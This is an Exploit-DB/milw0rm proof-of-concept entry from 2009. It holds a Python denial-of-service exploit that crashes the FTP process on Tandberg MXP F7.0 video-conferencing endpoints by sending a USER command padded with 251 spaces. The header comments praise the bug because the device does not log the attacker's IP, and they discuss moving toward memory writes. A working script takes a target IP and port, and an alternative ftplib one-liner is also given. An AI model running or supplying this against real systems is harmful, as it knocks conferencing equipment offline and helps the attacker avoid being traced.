Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)

EDB-ID:

9131


Author:

otokoyama

Type:

dos


Platform:

Windows

Date:

2009-07-13


#########################################################################################
#											#
# TANDBERG BoF v0.1 - Tandberg MXP F7.0<                                                #
# Buffer Overflow Vulnerability PoC                                                     #
# By otokoyama                                                                          #
#                                                                                       #
# [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly        #
#     known as a blank space.(very simple)						#
# [+] The BOF happens due to the system passing all usernames:passwords to a log file.  #
#                                                                                       #
# [+] Vendor has fixed THIS in the later releases of its firmware so it is now public.  #
#     											#
# 			                                                                #
# This is a good vuln due to the system not logging the IP address of the attacker.     #
# To be able to tell who was causing this you would need to grab a log from the FW      #
# and as TANDBERG does not provide timestamps on their endpoints pre f8.0               #
# you would need to have recieved a SNMP notification to TMS that the system rebooted   #
# and cross reference that with the IP's connecting through the firewall.    		#
# This is particularily annoying due to the fact that systems reboot all the time	#
# As endusers are constantly turning them on\off					#
# At this point the sysadmin goes "TANDBERG Can we buy an Expressway?"        		#
#										        #
# As far as it goes, creating a connectback shell would be difficult                    #
# this is mainly due to the process on the Endpoint that detects a memory mismatch      #
# and subsequently reboots the system(security measure).                                #
#                                                                                       #
# To create a successfull exploit outside of the DoS                                    #
# you would need to locate the memory address of the process that reboots the system    #
# (there might even be a fallback on that) This is generally too cumbersome as          #
# this embeded system doesn't do anything fun anyway (why would you want access)        #
#	                                                                                #
# In saying that,                                                                       #
# it would be fairly trivial to use the BoF to write something to the memory.           #
# you will notice buffer below only generates the exception 0x0200 aka Machine Check.   #
# Increasing the char sent to the unit will change that error to exception 0x1100       #
# meaning we are sending the MINIMUM required length to overflow the buffer.            #
# I have done the hardwork for you! Please email me if you get some encodes.  		#
# BTW, This could be done like this:                                                    #
# from ftplib import FTP                                                                #
# ftp = FTP('ip.addr')                                                                  #
# ftp.login(' '*251)                                                                    #
# ftp.quit()....but its dirty.		                                                #
#						                                        #		
# shoutouts:mabus,gso                                                                   #
#########################################################################################

import socket
import struct
import time
import sys


buff='USER '+' '*251+'\r\n'

if len(sys.argv)!=3:
	print "\n[+] Usage: %s <ip> <port>"%sys.argv[0]
	print "[-] Example: python poc.py 192.168.1.23 23\n" 
	sys.exit(0)

try:
	
        print "[+] Connecting... %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect((sys.argv[1],int(sys.argv[2])))
	print "[+] Sending data..."
	time.sleep(1.2)
	s.send(buff)
        print "[+] Deed Done"
        s.recv(1024)
	
except:
	print "[#] Unable to connect"

# milw0rm.com [2009-07-13]